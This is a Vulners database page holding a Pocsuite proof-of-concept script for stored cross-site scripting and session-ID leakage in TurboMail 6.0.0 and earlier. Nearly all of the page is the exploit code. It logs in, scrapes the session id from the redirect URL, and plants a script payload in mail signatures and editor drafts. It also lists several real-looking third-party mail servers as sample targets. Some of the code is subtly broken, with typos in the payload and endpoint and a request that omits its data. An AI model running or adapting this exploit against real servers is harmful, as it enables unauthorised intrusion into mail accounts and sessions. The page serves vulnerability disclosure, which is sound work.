Vulners
Lucene search
TurboMail <=6.0.0 /mailmain 跨站脚本漏洞
#!/usr/bin/env python
# coding: utf-8
import re
import random
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
vulID = '1709' # vul ID
version = '1'
author = ['lixin']
vulDate = '2014-05-15'
createDate = '2015-02-27'
updateDate = '2015-02-27'
references = ['http://www.wooyun.org/bugs/wooyun-2010-060786']
name = 'TurboMail <=6.0.0 /mailmain 跨站脚本漏洞 POC'
appPowerLink = 'www.turbomail.org'
appName = 'TurboMail'
appVersion = '<=6.0.0'
vulType = 'Cross Site Scripting'
desc = '''
TurboMail邮件系统是广州拓波软件科技有限公司面向企事业单位通信需求而研发
的电子邮件服务器系统,本次漏洞中,认证缺陷是由于系统使用get方式传递sessionid
值,造成sessionid值易泄漏。另外邮件签名档和邮件编辑器处还存在存储形xss漏洞。
'''
# the sample sites for examine
samples = ['http://www.turbomail.org:8888/',
'http://smtp.wunding.com/',
'http://220.178.102.4:8081',
'http://www.yd3.com.cn:8080/',
'http://mail.pyppipe.com:8080',
'http://mail.baik.com.cn/',
'http://211.103.235.165/']
def _attack(self):
return self._verify()
def _verify(self):
#认证缺陷检测demo:pocsuite verify poc.py --verify-code=auth-flaw [email protected] --password=12345 url
#邮件签名档xss检测demo:pocsuite verify poc.py --verify-code=xss1 [email protected] --password=12345 url
#编辑器xss检测demo:pocsuite verify poc.py --verify-code=xss2 [email protected] --password=12345 url
result = {}
if hasattr(self.params,'email') and hasattr(self.params,'password'):
email = self.params.email
uid = email.split('@')[0]
domain = email.split('@')[1]
pwd = self.params.password
PostData = {'uid':uid,'domain':domain,'pwd':pwd}
response = req.post(self.url+'/mailmain?type=login',data=PostData,timeout=10,allow_redirects=False)
Location = response.headers['location']
session_key1 = Location.find('sessionid=')
session_key2 = Location.find('_0/next')
if session_key1>-1:
sessionid = re.search('(?<=sessionid=).*?(?<=_0)',Location).group()
if session_key2>-1:
sessionid = re.search('(?<=tmw/).*?(?=/next)',Location).group()
if sessionid:
#认证缺陷,url传递sessionid漏洞检测
if self.params.verify_code=='auth-flaw':
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = Location
#xss漏洞检测
Random_num=''.join(random.sample("12347890",7))
Cookie = {sessionid:sessionid}
payload = '<script>alert('+Random_num+');</sciript>'
if self.params.verify_code=='xss1':
#检测邮件签名档xss
PostData = {'signTitle':Random_num,'signContent':payload,'type':'onlysign','subtype':'ret_json'}
response = req.post(self.url+'/tmw/'+sessionid+'/mainlmain?sessionid='+sessionid+'&intertype=ajax',cookies=Cookie)
response = req.get(self.url+'/tmw/'+sessionid+'/mailmain?sessionid='+sessionid+'&intertype=ajax&type=getSignature',cookies=Cookie)
keyowrds = re.search(u'<script>',response.content)
if keyowrds:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url+'/tmw/'+sessionid+'/mailmain?sessionid='+sessionid+'&intertype=ajax&type=getSignature'
if self.params.verify_code=='xss2':
#检测编辑器xss
PostData = {'smsgid':Random_num,'mbtype':'draft','request':'Send','cb1':'html',
'supportflash':'true','uploadall':'true','netdisk_num':'0','to':uid,
'subject':Random_num,'htmlbody':payload,'savesend':'true','priority':'3',
'charset':'UTF-8','type':'savedraft',
'sessionid':sessionid,'intertype':'ajax'}
response = req.post(self.url+'/tmw/'+sessionid+'/mailmain',data=PostData,cookies=Cookie)
msgid = re.search('(?<=msgid":").*?(?=")',response.content)
if msgid:
msgid = msgid.group()
response = req.get(self.url+'/tmw/'+sessionid+'/mailmain?type=getMessageForEditor&subty'\
'pe=composedraft&mbtype=draft&msgid='+msgid+'&formatreturn=false&mbid'\
'=0&sessionid='+sessionid+'&intertype=ajax',cookies=Cookie)
keyowrds = re.search(u'<script>',response.content)
if keyowrds:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url+'/tmw/'+sessionid+'/mailmain?type=getMessageForEdi'\
'tor&subtype=composedraft&mbtype=draft&msgid='+msgid+'&form'\
'atreturn=false&mbid=0&sessionid='+sessionid+'&intertype=ajax'
return self.parse_verify(result)
def parse_verify(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
register(TestPOC)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Mar 2015 00:00Current
7.1High risk
Vulners AI Score7.1